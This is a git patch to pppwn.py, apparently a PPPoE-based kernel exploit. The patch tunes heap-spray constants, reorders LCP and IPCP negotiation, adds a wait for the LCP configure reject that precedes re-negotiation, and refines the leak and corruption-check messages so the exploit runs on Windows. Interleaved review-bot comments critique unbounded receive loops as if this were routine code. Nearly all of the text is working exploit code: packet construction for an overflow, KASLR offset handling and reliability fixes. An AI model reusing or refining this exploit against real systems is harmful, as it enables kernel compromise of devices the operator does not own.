From ec9d54d5e2cc10135e0ecfd971c5fdec66829c7f Mon Sep 17 00:00:00 2001
From: Andy Nguyen
Date: Wed, 1 May 2024 12:39:37 +0200
Subject: [PATCH] Make it work on Windows.
---
 pppwn.py | 66 +++++++++++++++++++++++++++++++-------------------------
 1 file changed, 37 insertions(+), 29 deletions(-)
diff --git a/pppwn.py b/pppwn.py
index 7999bfe..e357eb2 100644
--- a/pppwn.py
+++ b/pppwn.py
@@ -149,12 +149,12 @@ def handler(self, pkt):
 class Exploit():
- SPRAY_NUM = 0x800
+ SPRAY_NUM = 0x1000
 PIN_NUM = 0x1000
 CORRUPT_NUM = 0x1
 HOLE_START = 0x400
- HOLE_SPACE = 0x4
+ HOLE_SPACE = 0x10
 LCP_ID = 0x41
 IPCP_ID = 0x41
@@ -182,6 +182,20 @@ def kdlsym(self, addr):
 return self.kaslr_offset + addr
 def lcp_negotiation(self):
+ print('[*] Sending LCP configure request...')
+ self.s.send(
+ Ether(src=self.source_mac,
+ dst=self.target_mac,
+ type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
+ PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID))
+
+ print('[*] Waiting for LCP configure ACK...')
+ while True:
+ pkt = self.s.recv()
+ if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+ PPP_LCP_Configure].code == CONF_ACK:
+ break
+
 print('[*] Waiting for LCP configure request...')
 while True:
 pkt = self.s.recv()
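Review bot: The new `while True` receive loop that waits for CONF_ACK in lcp_negotiation never terminates if the expected reply is not seen: a missed frame leaves the tool blocked with no error, and a falsy `self.s.recv()` result (which the `if pkt and ...` guard anticipates) just spins. The same shape is repeated in the CONF_ACK loop of the new ipcp_negotiation and in the CONF_REJ loop added to run, so one bounded variant could serve all three. Bound the loop and fail loudly, e.g. `for _ in range(MAX_RECV_ATTEMPTS):  # MAX_RECV_ATTEMPTS: placeholder bound` with a `for ... else:` that raises `RuntimeError('no LCP configure ACK received')`. A short docstring on lcp_negotiation stating the expected exchange order (send CONF_REQ, wait for CONF_ACK, then wait for the peer's CONF_REQ and ACK it) would also help, since the method body continues past the hunk.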
@@ -196,21 +210,23 @@ def lcp_negotiation(self):
 type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
 PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id))
- print('[*] Sending LCP configure request...')
+ def ipcp_negotiation(self):
+ print('[*] Sending IPCP configure request...')
 self.s.send(
- Ether(src=self.source_mac,
- dst=self.target_mac,
- type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
- PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID))
+ Ether(
+ src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
+ / PPPoE(sessionid=self.SESSION_ID) / PPP() /
+ PPP_IPCP(code=CONF_REQ,
+ id=self.IPCP_ID,
+ options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4)))
- print('[*] Waiting for LCP configure ACK...')
+ print('[*] Waiting for IPCP configure ACK...')
 while True:
 pkt = self.s.recv()
- if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
- PPP_LCP_Configure].code == CONF_ACK:
+ if pkt and pkt.haslayer(
+ PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK:
 break
- def ipcp_negotiation(self):
 print('[*] Waiting for IPCP configure request...')
 while True:
 pkt = self.s.recv()
@@ -243,22 +259,6 @@ def ipcp_negotiation(self):
 id=pkt[PPP_IPCP].id,
 options=pkt[PPP_IPCP].options))
- print('[*] Sending IPCP configure request...')
- self.s.send(
- Ether(
- src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
- / PPPoE(sessionid=self.SESSION_ID) / PPP() /
- PPP_IPCP(code=CONF_REQ,
- id=self.IPCP_ID,
- options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4)))
-
- print('[*] Waiting for IPCP configure ACK...')
- while True:
- pkt = self.s.recv()
- if pkt and pkt.haslayer(
- PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK:
- break
-
 def ppp_negotation(self, cb=None):
 print('[*] Waiting for PADI...')
 while True:
@@ -670,6 +670,7 @@ def run(self):
 dst=self.target_mac,
 type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
 PPP(proto=0x4141))
+ self.s.recv()
 sleep(0.0005)
 print('[+] Pinning to CPU 0...done')
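Review bot: The added `self.s.recv()` in run discards its return value and carries no comment, so a reader cannot tell whether a specific reply is expected at this point or whether the call only keeps the receive path drained between sends (the commit title suggests a Windows-specific reason, but the hunk does not say). Add a why-comment on that line, such as `# read and discard one frame per send; presumably keeps the capture buffer from backing up on Windows — TODO confirm`, or, if a particular frame is expected, check it the way the other receive loops do. The enclosing run method starts and ends outside this hunk.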
@@ -692,6 +693,13 @@ def run(self):
 (TARGET_SIZE - 4)) /
 PPP_LCP_Option(data=overflow_lle))))
+ print('[*] Waiting for LCP configure reject...')
+ while True:
+ pkt = self.s.recv()
+ if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
+ PPP_LCP_Configure].code == CONF_REJ:
+ break
+
 # Re-negotiate after rejection
 self.lcp_negotiation()
 self.ipcp_negotiation()
@@ -732,7 +740,7 @@ def run(self):
 ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))
 if not corrupted:
- print('[-] Scanning for corrupted object...failed')
+ print('[-] Scanning for corrupted object...failed. Please retry.')
 exit(1)
 print(
@@ -756,7 +764,7 @@ def run(self):
 if (self.pppoe_softc_list & 0xffffffff00000fff !=
 self.offs.PPPOE_SOFTC_LIST & 0xffffffff00000fff):
- print('[-] Error leak is invalid.')
+ print('[-] Error leak is invalid. Wrong firmware?')
 exit(1)
 print('')